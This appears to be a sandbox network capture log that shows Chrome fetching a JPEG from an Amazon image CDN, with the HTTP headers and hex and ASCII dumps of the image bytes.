                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: c9 cc df 44 0c db d6 e6 b5 65 3d 0f df ce de fa 7c e9 fe 9d 3d 5c b4 c3 30 59 1c 6a ec 36 31 7f 43 bd 44 4d 8a cf c3 f4 00 00 00 6c 5c ab c3 97 e6 4b b4 f4 e2 04 c8 f0 00 00 00 2d dd e0 6b e6 9f 59 f8 2b 3e 5e df 67 0b 73 8f 4d 48 e7 a4 1f 77 e3 b3 0a bf 96 48 ef e3 8f f8 f3 f9 5c fe 72 f7 f0 bb b9 ed 96 fe 4f b6 3b 74 a5 3b f8 3c db 74 33 d3 ca ed 3f a8 dd 71 c9 bd a3 b2 6e 09 4e c1 f9 03 db c0 01 e1 cb f7 d3 af 97 97 60 00 00 01 b8 f3 da 38 64 ec bd 64 47 56 aa e6 30 00 00 03 95 37 d3 ad b3 20 f1 9d c7 95 ec ca bf b7 9d 47 bf 15 17 6c 57 df a6 8b 7a 75 fb be af 19 23 cb 76 65 97 7b 5b f4 8f a3 cb c3 95 47 cb bd dd 6c d5 bc 21 8e 78 a4 c6 fc a5 fc e3 f7 b1 af 69 65 89 79 8f ae dd 6e ca 4b b7 e4 f6 fd e0 00 00 00 00 00 01 22 bb 54 87 39 67 36 58 11 2d a4
                                                                                                                                                                                                        Data Ascii: De=|=\0Yj61CDMl\K-kY+>^gsMHwH\rO;t;<t3?qnN`8ddGV07 GlWzu#ve{[Gl!xieynK"T9g6X-
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: d4 00 00 00 00 00 00 00 00 00 00 e1 66 e9 a0 f5 7f 40 ab c7 7f d9 f3 f8 f5 e7 9e 7a cd 36 72 69 7f 7c 6d 7d bf 2f 6d b6 cd 6f 90 2b 86 91 d5 4d 06 ad c7 2d c9 44 9a 0a 67 dd 7f f4 ed 05 95 4f 83 e3 ed c7 49 14 4a a4 7d 7d 7f 3c 5e 54 3e 3f a7 af 3d b2 db 55 be 61 6b 54 cc 87 d7 b7 46 f4 7a 88 00 00 00 00 00 00 00 00 00 03 9a 7a dd 33 07 7a 74 99 3a 6f db 87 fd 3a 69 2f d3 e1 b1 9e 3e b9 77 a7 6d 3d f7 f2 92 6f 8f e8 d5 5f a3 ca ad c2 62 a9 df 6f 30 b5 ba 66 f9 fc 9e fe 1c f1 24 9f 17 d5 af 9e de 7a bd ef e3 84 3d 3a 67 cf 1f 5d 25 fa bc 24 53 e3 fa 25 c3 e0 fa c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1f ff c4 00 53
                                                                                                                                                                                                        Data Ascii: f@z6ri|m}/mo+M-DgOIJ}}<^T>?=UakTFzz3zt:o:i/>wm=o_bo0f$z=:g]%$S%S
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 03 6c c7 d4 36 80 3f 4c 68 06 1e 61 cf e9 c1 71 f7 0f ab 05 e7 83 76 9f 5e dd 7b 7e ec 51 c3 5b 04 11 36 ca 96 db a3 14 aa 51 0c dd 58 a7 2a 36 58 ae 13 45 c1 db 83 8f 19 25 4e 82 84 55 23 6c a8 98 ea 53 46 bf 24 83 62 ac 5e 47 0e 4b 13 c7 11 02 80 98 c3 a1 4b cc 46 5a 40 64 1d 09 c3 e2 53 e4 81 7c 7d 00 c0 00 25 03 07 3d 0b c1 32 02 87 bc d1 04 cb 83 9d 00 26 c1 7d 5d 80 22 1e a0 c0 0e 9c 83 90 60 17 54 39 ed 60 ae 43 d6 5d 3e a8 82 89 9f 4e c0 e5 a6 cf df b5 cb 90 ed 88 75 0d d5 d3 91 ba be 26 6d 98 9d 3d 98 27 d3 53 14 89 60 54 50 07 a8 90 88 80 e3 53 89 7a c4 12 8e 04 74 ec 2e 00 da 8e 98 d7 4e de 41 de 20 e0 43 5d af a0 47 9e 39 00 8e 22 50 07 62 44 78 a4 9a 17 dd 4c 2e 32 3d 1e 1f 2d 2b 49 81 76 03 76 73 6c f8 f1 32 03 1e e8 0e 3f 12 a7 25 ca 02 06
                                                                                                                                                                                                        Data Ascii: l6?Lhaqv^{~Q[6QX*6XE%NU#lSF$b^GKKFZ@dS|}%=2&}]"`T9`C]>Nu&m='S`TPSzt.NA C]G9"PbDxL.2=-+Ivvsl2?%
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 65 f2 e1 f3 76 cd ca b4 34 ab a5 63 c4 90 b9 ef 7a 52 03 7e 45 1b 20 0c 10 45 a2 08 a4 26 32 69 98 fc 8e 20 1b 61 e5 ab 8e b7 ec 77 22 3d 76 a3 a7 7e c6 e7 7d 20 29 80 f5 5b 00 17 c9 97 91 43 d5 a6 98 bf 42 ca d8 e0 0b 09 12 54 4c 67 2e 51 3b fc 05 21 77 70 2d 61 de be 6a d4 52 74 ab 97 02 5c be a8 f4 4c 4c 2a d1 82 e9 a4 36 f3 83 51 04 50 6a 82 4d 5a a2 46 cd 5b 14 08 d9 b4 a3 bd c0 02 61 cc c3 cf 48 f7 49 20 d0 a5 5f 42 ac 73 18 c7 2e 79 ac dd ee 58 58 5b 26 3b 4a ed b6 36 e6 06 bf 03 6f 6a 57 6b 38 9f 93 7a c5 34 92 7c a4 6b a8 14 2e b5 08 1a e5 72 2a 35 ab 59 98 c5 5d 4e 79 0b 65 e6 37 2f a6 e4 22 12 2c c0 96 61 b2 72 2f d2 59 2a 66 60 bf 66 9b f9 1b 42 cf e6 dd ba 85 66 ea 7b 20 6a f3 32 6d 9f b6 90 73 0e dd 24 da 26 e6 37 cb d7 1c ee 64 01 31 1e ab
                                                                                                                                                                                                        Data Ascii: ev4czR~E E&2i aw"=v~} )[CBTLg.Q;!wp-ajRt\LL*6QPjMZF[aHI _Bs.yXX[&;J6ojWk8z4|k.r*5Y]Nye7/",ar/Y*f`fBf{ j2ms$&7d1
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 32 40 db 53 ae 07 98 69 14 c8 30 fd 65 09 95 96 33 80 0e df 0b 6d d9 c4 c8 ff 00 b0 b2 81 ff 00 92 21 8b 22 4d de 4c 54 59 3b 44 ae 5a 38 7b 10 93 96 f1 71 51 91 2c d2 61 18 c1 26 0c 9a 94 a4 6e d9 5e 5d 98 15 7f 06 37 9f 87 1b cf c3 80 57 f0 60 86 13 0e bf f2 02 10 51 0e a8 7a b1 30 44 91 7c b1 53 28 26 42 e8 22 19 8b 9b 02 f1 d3 ca ed 69 c6 c4 5b 22 9f a7 e7 72 79 ac 95 ed 84 ce 58 22 f5 b5 6a 02 69 23 3e b3 bf b4 d4 1b f7 3d ce d7 ed 90 92 49 5d 13 93 4d cb 17 35 7c 97 6c 47 39 8a c9 75 63 40 63 64 db 49 ae d9 0c c9 cb 70 96 13 d8 ab ec ca a4 a2 68 ee 64 a1 f2 b7 37 5e 54 1d 16 b1 63 51 59 0a c1 54 dd 31 78 82 e8 b9 45 37 0d d5 2a e8 2c 1a a4 b7 96 88 1d 99 36 63 f8 c0 31 25 fb c1 f7 f3 54 f2 96 05 03 a7 26 47 e9 74 e3 91 94 c4 71 fe 13 67 cf e7 e3 22
                                                                                                                                                                                                        Data Ascii: 2@Si0e3m!"MLTY;DZ8{qQ,a&n^]7W`Qz0D|S(&B"i["ryX"ji#>=I]M5|lG9uc@cdIphd7^TcQYT1xE7*,6c1%T&Gtqg"
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 80 e1 b3 22 37 d9 dd a8 e0 e0 42 09 0b 8d 83 14 fe bc 19 40 29 80 87 48 c7 da 1d 00 c7 72 80 97 aa d1 73 f5 76 83 12 cb 94 e8 86 ac 16 0d e1 75 2e 27 54 da 54 36 1b a8 98 88 f9 d4 db 2a 16 2a fc 74 a1 0f aa a7 4c 08 f9 37 0a 06 a3 81 53 1b cc 6f 30 0a 7d f8 45 4c 19 d1 08 96 a6 1d 0a 98 6a 61 5f 61 75 d7 5c 4b cd 63 08 8e 33 09 ce fa c5 7b 7a 98 6d 14 cf 0c dd 30 cb b8 fe 94 b1 c6 a6 21 d4 22 80 a1 c5 d6 5b 57 a7 cc b3 97 90 08 2c ab ad ae 21 7a b5 0a 32 b2 ec ee a2 a2 d3 64 b2 c5 02 2e b8 76 07 8b a0 79 4a a2 5c 9e 2d f4 ec 94 31 61 47 7b 18 a0 fa d1 12 9c 3c 9a 89 ed 86 9b 42 5c 20 d5 66 e6 3e cb c3 a8 53 ff 00 86 00 a0 0f cc 1c 01 d4 fa a4 1c 02 ea 07 61 09 8e 31 6e c1 2e b8 76 81 dd 00 86 c9 13 d7 12 74 4e 90 da f7 ee c6 d7 aa ad 5c 9b a7 3a 3a b1 d2
                                                                                                                                                                                                        Data Ascii: "7B@)Hrsvu.'TT6**tL7So0}ELja_au\Kc3{zm0!"[W,!z2d.vyJ\-1aG{<B\ f>Sa1n.vtN\::
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 5e 06 5f e6 dd 3d 2a ac 44 6c cc 97 45 48 44 37 4d ba a9 66 c5 be 12 c7 6c 8e 9a ad ac 75 81 82 09 10 ee 3c 4a d3 3d eb 93 3b 30 75 1b 79 9e 2c 8b 30 7c d1 56 e3 e7 0f 34 c4 c5 31 0c 62 18 36 4c 5e 46 0e f6 ba 76 f2 c2 a9 24 ba 67 45 74 ca b2 4a 72 51 2c f1 ac 57 ab 52 d0 cb c0 a2 58 f5 e4 88 b1 df 30 94 55 e2 f9 55 22 bc 88 69 20 b5 7d 53 3e 0e e7 11 0e 8f b4 97 5e b0 2c db 52 e7 6d d2 52 ab 0f 18 ca 19 61 66 f6 70 eb 01 9f 57 32 7c d2 70 f1 93 52 57 39 30 95 92 41 37 02 ae 4a 23 c3 e6 64 d3 7d f0 b8 dc 37 7a 4e 23 37 fe 56 2b 5f cb 8e ef 77 45 fe e0 af fe 70 f8 cb e1 01 a3 54 b4 1d 7e 0f 6b 8c f3 f9 46 ad fe 49 9e 33 b7 e4 e6 67 fd f6 98 c8 bf 93 e6 5f 98 73 8c f3 f9 46 ad fe 49 9e 3b a1 18 2e e2 a7 1c f5 22 ed 27 1c f0 bc 56 32 9e 7a 3e 5e 91 06 93 77
                                                                                                                                                                                                        Data Ascii: ^_=*DlEHD7Mflu<J=;0uy,0|V41b6L^Fv$gEtJrQ,WRX0UU"i }S>^,RmRafpW2|pRW90A7J#d}7zN#7V+_wEpT~kFI3g_sFI;."'V2z>^w
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 84 74 e0 ad 92 06 ae 08 ed b3 77 49 6b ba 72 42 a8 9f 8e e0 ca 91 05 8e 82 7b e5 88 43 0a 28 e4 f5 c3 32 ad 2b d9 09 7c ad f4 22 2c 4e 4e 8e 5b fc 82 db 60 8b ab 77 51 bb 9f 9a 5c 5b 45 c7 1d b0 bb 5d a7 74 1e 55 be 76 d5 93 69 e5 0e e5 e2 84 49 b9 3b a5 be 4a a4 bf 34 cf 19 26 a1 11 ca 4a 7a aa 9c 13 49 26 aa 19 43 b1 bf e6 c6 70 ce cb 23 96 cf 5b d4 aa 90 c7 d9 e9 7a 86 61 66 0d 5b 31 9a 65 96 67 38 6f 2e 79 72 6d 43 cf 66 f6 6d 4f c0 cf c5 65 fd 05 99 1e db e5 b7 62 a3 8a d4 17 74 7c 7c c4 4b c9 eb 64 5c bc 32 8b a1 d3 51 9d d3 0b e6 00 2c d5 0b 01 9a 16 a2 ab e5 8d 5a 4b 2b 51 ce 42 3b 68 6b bb b6 2b 55 f8 10 e0 53 6b 9c f9 9a e2 f9 7f a7 c2 43 12 d0 f5 9b 97 e8 56 5a d6 6c 19 85 4d ab dc 6c d9 c8 e1 35 13 8e d8 5a 2d 18 09 ee e8 5c d8 41 cd 8e b1 2e
                                                                                                                                                                                                        Data Ascii: twIkrB{C(2+|",NN[`wQ\[E]tUviI;J4&JzI&Cp#[zaf[1eg8o.yrmCfmOebt||Kd\2Q,ZK+QB;hk+USkCVZlMl5Z-\A.


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        89192.168.2.449867151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC678OUTGET /images/G/39/UAE-hq/2022/img/Events/XCM_Manual_1463368_4956629_400x400_2X._CB609908562_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 24841
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: ffc89087-fd92-40e3-bcb5-5a38e7f44867
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 19 Sep 2022 08:03:02 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sat, 13 Feb 2044 09:15:56 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 202085
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:05 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000044-IAD, cache-ewr-kewr1740057-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 04 04 04 05 04 06 05 05 06 09 06 05 06 09 0b 08 06 06 08 0b 0c 0a 0a 0b 0a 0a 0c 10 0c 0c 0c 0c 0c 0c 10 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 07 07 07 0d 0c 0d 18 10 10 18 14 0e 0e 0e 14 14 0e 0e 0e 0e 14 11 0c 0c 0c 0c 0c 11 11 0c 0c 0c 0c 0c 0c 11 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c2 00 11 08 01 90 01 90 03 01 11 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 05 06 03 04 07 02 01 08 01 01 00 01 05 01 00 00 00 00 00 00 00 00 00 00 00 00 05 01 02 03 04 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fd 52 00 00 00 00 00 00 01 af ad 97 47
                                                                                                                                                                                                        Data Ascii: JFIF5RG
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: d3 a8 5b 9a cb 6e 7e 7d 93 4a 36 ed 45 33 f4 9c 72 37 3e 0f 7c a8 00 00 00 03 dd f6 df 7b ee 6b 47 47 62 9b c6 4f 80 00 00 00 07 0b f4 6e 42 4b 77 57 47 36 3c f0 92 7d a7 81 ea 87 e7 1e fb 96 cb 2f 1f 75 a3 6f 4f 3f 49 f3 7e c8 08 9e 8a 1f 94 74 dc f4 d5 d8 ab da 3d 06 1d 8c 72 f4 bf 4e ec 71 68 ef d0 7e 75 da 00 00 00 00 00 b9 76 70 1a 5a 5b 15 ae 66 5c 00 00 00 00 38 5f a4 71 f3 1b 7a d1 79 b1 d8 b9 59 ee 9d c8 4f 8e 2b d7 c0 57 7a 78 4b c5 1b 91 9b 9d 23 cf 7a e0 2b 73 d1 14 6e af 9b d3 59 23 64 85 de c9 ba 15 f1 55 2a e0 92 b6 9d db ce 7b 0f 75 00 00 00 00 05 97 a6 88 d4 d3 cf 0b 0b 20 00 00 00 00 1c 33 d2 b8 c9 4d bc 11 19 ac bf 70 fd 2d e3 9c 98 1c 8f a9 85 aa f5 bc f5 ba 95 de 8b dd e9 5e 7d d6 8d 7a 29 b3 71 b5 ae bf 92 9d b6 4e a3 7c 47 9b b5 f1
                                                                                                                                                                                                        Data Ascii: [n~}J6E3r7>|{kGGbOnBKwWG6<}/uoO?I~t=rNqh~uvpZ[f\8_qzyYO+WzxK#z+snY#dU*{u 3Mp-^}z)qN|G
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 30 dd 4e 39 d1 c4 ea 64 b7 b1 f3 92 df 9b 3b 5e 7b a5 c2 48 58 f4 b6 21 76 b0 de 22 b7 79 6c f4 67 6a e6 66 05 1a 53 4b 5a fb 68 12 fa 5d 2e 12 43 98 ce 47 7e 84 e4 27 40 00 4d 4d 47 d9 fa 98 70 06 b6 b6 6a 47 0d d0 fc a5 40 03 f3 df 5f 05 fa 13 90 9d fc f9 d7 c1 74 88 59 0c 57 52 85 2d a5 68 d0 d8 b5 68 6d 72 d9 e8 cb 46 86 cc 0e de 1b 94 6e dd 0e 5b 4b be f2 53 63 9c 4c c7 d4 e4 35 a0 76 f0 76 ae 62 63 9b 4d c7 77 0e 5e 66 93 27 a7 0b b5 86 73 53 3d 77 77 5f ab 40 49 8e 05 d6 42 77 be 4e 6f 53 25 95 5d fd 6a 1c b6 97 73 e5 a6 40 03 ed 69 77 ee 79 ed 9d 9c 20 01 5a e6 25 e0 e0 e4 40 02 9b 25 a9 44 95 d2 b7 47 6d 58 35 33 f8 aa 03 6f 05 d2 33 6f 93 74 11 9b 56 5d d4 20 a4 79 37 41 19 64 d2 d8 1d 06 23 78 73 f9 7d 1b fc 46 f4 3e c6 28 6d 9c 34 59 5d 2c b4
                                                                                                                                                                                                        Data Ascii: 0N9d;^{HX!v"ylgjfSKZh].CG~'@MMGpjG@_tYWR-hhmrFn[KScL5vvbcMw^f'sS=ww_@IBwNoS%]js@iwy Z%@%DGmX53o3otV] y7Ad#xs}F>(m4Y],
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 10 0c 60 2e 59 11 55 68 47 89 12 52 56 41 59 13 26 a1 55 30 20 92 66 11 10 57 a8 40 a2 43 01 b1 25 4e 45 40 13 d7 2a 99 4a 73 0e af 93 81 96 f5 a4 fd 5d 6f 26 49 fa 6c 9b 19 53 2c aa 8b 2a 65 54 f6 ef cb 77 34 79 f5 02 31 a9 8d cf 51 63 55 e9 01 07 4c 8e 50 e9 01 11 ea fc 20 dc 55 48 44 40 0a 2e 3b cc 4c e4 30 70 62 a4 2a 10 a0 43 32 13 09 44 a4 44 c0 60 ef 35 50 ff 00 d1 0c cb f2 88 aa a2 2a 95 54 e3 5f a6 f5 b1 55 2f b6 63 14 a5 13 1a 5a 44 cf 5d 09 c3 c8 d8 24 39 e8 b6 02 92 19 a9 4f c0 01 1b 14 4b d4 2f 5a 97 a0 c6 c7 68 8a 60 50 ca 53 14 65 ad b1 d1 ee 36 4c 04 6c 3d fd e3 58 b6 ca 2a 27 1e 21 d9 82 a9 f5 18 63 13 31 0c 51 2b 00 15 4d d7 ae 92 2a 75 16 65 2f ca 44 c8 19 93 a0 38 94 c5 31 40 c5 f6 ac b2 3d da 40 cd 3f 26 c0 80 2f 03 24 80 d7 48 02 8a
                                                                                                                                                                                                        Data Ascii: `.YUhGRVAY&U0 fW@C%NE@*Js]o&IlS,*eTw4y1QcULP UHD@.;L0pb*C2DD`5P*T_U/cZD]$9OK/Zh`PSe6Ll=X*'!c1Q+M*ue/D81@=@?&/$H
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: c0 00 8b 56 a7 4f 93 aa ca 3c 80 00 0e e3 60 0e 5e 15 5e 26 b6 97 3d cc ad 5e be f1 e2 0f 0c bd 6a 35 67 85 76 ea 10 0b 1c 87 ab b1 64 aa aa 08 0a 91 1f a0 7f 36 be 7e 99 54 83 26 0d d5 26 e4 7c eb 49 85 b5 c2 75 12 f8 80 8a 7c 19 ca e2 65 78 0d 3e 80 a7 53 3a 83 d9 bd 91 38 c6 c0 ae 46 22 52 ff 00 18 13 91 3f 59 f8 d6 0a 95 7b 4a e6 ed 9e fe a6 4c 65 f4 c2 fe 96 39 c7 3f 01 c7 7f 5c 5b eb 87 f8 e3 5f 8e 47 7d 32 23 f4 0f e6 c3 9b a6 4d b0 e4 90 f3 22 e7 ce d8 4a 95 1d 89 32 07 1e f8 b9 d4 7e 79 1d 72 81 50 a4 c4 a6 1d 9b c8 c5 2d 66 30 e2 82 fd 47 12 e3 65 44 7d d9 a7 53 ea 95 96 58 7b 27 bf a9 93 19 7d 30 bf a5 8e 71 cf c0 71 df d7 16 fa e1 fe 38 d7 e3 91 df 4c 88 fe 5c fe 6c 68 f1 22 db 24 83 fe 60 e7 ce db 8d 0a 5d 80 ec 45 10 03 10 40 53 28 02 e4 11
                                                                                                                                                                                                        Data Ascii: VO<`^^&=^j5gvd6~T&&|Iu|ex>S:8F"R?Y{JLe9?\[_G}2#M"J2~yrP-f0GeD}SX{'}0qq8L\lh"$`]E@S(
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: af 36 2c 6a 71 3b 5e dc e6 b3 52 51 d3 3a 1e 98 69 63 84 4e 76 c1 7f aa 9a b1 72 8b 8c 0d af 6e 73 59 a9 2a e9 9d 17 4d c7 d8 20 d3 9e b2 6b f5 a4 29 db 4d cd 2f 37 8b 87 4d b6 54 2b 96 8d b4 cd 85 dc e3 4b 04 f6 3d 78 dd 93 35 de 38 d2 ad 9c 4e db 27 6e 2f 20 c7 ec 56 ed 71 1c 36 4f ed d9 5c d6 fb 1b ec 5a af d4 ca de f9 f1 a9 e6 31 39 b9 ff 00 6d 66 33 d1 e3 fb 29 ee 5c 5a 24 ee a7 32 d9 5f 47 07 4a 89 67 5a 0f 66 e3 b4 f8 15 39 74 d1 d2 35 7f 07 a8 11 f2 db 1b d7 2a bb 71 0b 22 a6 dc da e8 ad 01 ce 69 87 68 2b b4 1f 2a cf da ac b2 ef 5c 99 c9 bd 89 16 65 76 cd 44 44 c5 31 0c 25 37 b2 ba a9 41 ef c3 38 90 cd 90 e1 bc f6 df 8f 64 c3 76 fe dc c8 e6 8b fd bd 6d 9b cf f7 1e 1f 3d 21 da 2a a5 5a 3d c9 35 64 93 57 f4 28 73 37 de 62 03 b1 e2 00 3d 21 da 2c a5
                                                                                                                                                                                                        Data Ascii: 6,jq;^RQ:icNvrnsY*M k)M/7MT+K=x58N'n/ Vq6O\Z19mf3)\Z$2_GJgZf9t5*q"ih+*\evDD1%7A8dvm=!*Z=5dW(s7b=!,
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 7f 5e 29 bd 2a df c0 8c 67 8f eb 2d c7 e8 df 13 a3 13 c1 6f 63 ea 3a ff 00 51 e8 07 13 89 37 ae 3c 58 f5 fb f8 62 35 88 75 9e 53 7b b1 33 b8 3e 2d ec 3d 43 4f 0b 33 a0 1e 2d ee 3d 47 4c 46 b2 8e b1 c9 6f 76 24 dd 39 f1 64 d3 ef e1 8d 41 e0 7e 7a c1 10 71 66 36 18 4d eb 79 6d a2 fa b8 9c 4a 4a f9 03 45 f5 0f 99 ca 42 f9 07 55 f5 1c 26 e9 bc b5 d5 7d 5c 46 18 3a 1e 0c a6 e3 e7 3a 01 c4 e0 09 a4 f2 bc 41 fe ec 48 5c f4 0e 81 e6 1f 37 90 a1 e9 1d 07 ce 30 04 32 79 5e 21 ff 00 6e 35 07 81 f9 b3 58 9e 6a 0d 58 f9 86 0e ee 0e 88 d7 a7 eb 1e 9e eb 05 51 c5 89 b0 1e bc 6d 9a 28 7b 1e a2 20 7d 59 af 8d ad 14 c0 1b 13 00 79 86 bd b1 ab 62 aa 56 04 90 08 a6 a8 d6 dc 7f 27 89 65 3b f0 5a 15 68 64 47 74 52 41 74 47 0a ec 97 53 cb 55 cb 87 93 34 84 2c 63 76 dc a6 6e 6a
                                                                                                                                                                                                        Data Ascii: ^)*g-oc:Q7<Xb5uS{3>-=CO3-=GLFov$9dA~zqf6MymJJEBU&}\F::AH\702y^!n5XjXQm({ }YybV'e;ZhdGtRAtGSU4,cvnj
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 4d 8f 46 0e 80 1d 0e ba 8e 18 16 04 66 00 f4 f4 9c 73 14 df d2 30 a1 02 4d 56 a0 0e 16 ef a9 48 3f 7f cd 0e 57 43 75 23 1a 38 d2 45 ea 6f 00 6c a0 5c 93 d0 06 3f 14 9c 98 97 b3 af d3 e0 45 d8 ec fa 9d 3c d1 31 c2 eb eb e8 c6 84 00 13 87 1c 68 da 8b 8b 93 81 6d 3a 4f 5e b7 3d 38 89 67 a4 77 71 55 0c 8a 19 1e 24 86 47 60 ca 74 28 ec 15 5a fe 56 28 a2 a0 a3 5a 4a 4a a8 a9 e9 91 62 8f 33 99 51 dd 55 6c 06 6d df 2a de 4e 05 c8 ea d6 d7 ea c0 ea d7 4b 80 7b 30 2d 6b 37 41 d3 5c 28 d3 8d bf eb 5d 31 c3 3c e7 d7 3b 9f 9a fe 29 f9 32 af 67 5f a3 06 ea 45 c1 1d 20 fc 73 cb 90 5e 52 3a 17 a0 7a 7c 11 b0 96 92 78 c9 b5 ed 9a 36 17 b7 a7 16 5b a0 be bd 43 8e 08 e4 da da e3 81 bd ad 7d 7f ea f8 d3 4b 95 1d 43 41 af 56 07 26 8e 90 8b fd 39 e4 00 1f 66 39 31 a7 7e 6c d9
                                                                                                                                                                                                        Data Ascii: MFfs0MVH?WCu#8Eol\?E<1hm:O^=8gwqU$G`t(ZV(ZJJb3QUlm*NK{0-k7A\(]1<;)2g_E s^R:z|x6[C}KCAV&9f91~l
                                                                                                                                                                                                        2024-08-15 13:38:05 UTC1378INData Raw: 60 b7 50 14 b2 c6 b1 f9 0e be 37 27 1f 08 b6 dd 46 d0 aa 8e 48 a5 a9 aa 86 39 73 47 3f e3 a3 65 07 2b c4 fc 37 4d f2 49 e2 a6 36 fd 7f 79 53 67 34 d4 a2 95 52 30 59 6c ad 2a 03 69 5a 33 aa e6 c5 45 54 f4 55 09 04 72 d0 0a 78 80 63 02 e5 ce ac 4e 60 ef af 2b c5 c5 30 a1 a2 89 05 3a ce e0 09 56 26 b0 dc c4 6d 75 cd 60 32 af 3b 1d 3e 17 9c 8c 18 7a 0d f1 aa b0 04 1e c3 ae 38 b8 08 3e d1 b1 fb bc 31 cc c6 ac 8e 3d 0b 1a 28 fb 86 2f 94 db 87 56 0f 1b eb fc 30 b7 8a 8a 91 f3 3f 54 93 c8 aa b6 fb 31 cd dd 1c 8a ea 5a 6a b3 d4 48 0d 01 f5 77 ba e3 5b 8b f1 b6 35 eb 03 06 f2 2d 4c 52 29 e1 a4 6c 24 b7 e8 fc 42 b1 43 59 1c 90 ad 5b 30 8f 75 31 28 f0 80 e7 94 0c 92 22 af 23 1b 5e a6 29 0c c6 9e be 85 a6 74 82 4a 88 1a d2 73 8b 22 19 62 0c ec 99 57 e5 23 7f 2b 1b 46
                                                                                                                                                                                                        Data Ascii: `P7'FH9sG?e+7MI6ySg4R0Yl*iZ3ETUrxcN`+0:V&mu`2;>z8>1=(/V0?T1ZjHw[5-LR)l$BCY[0u1("#^)tJs"bW#+F
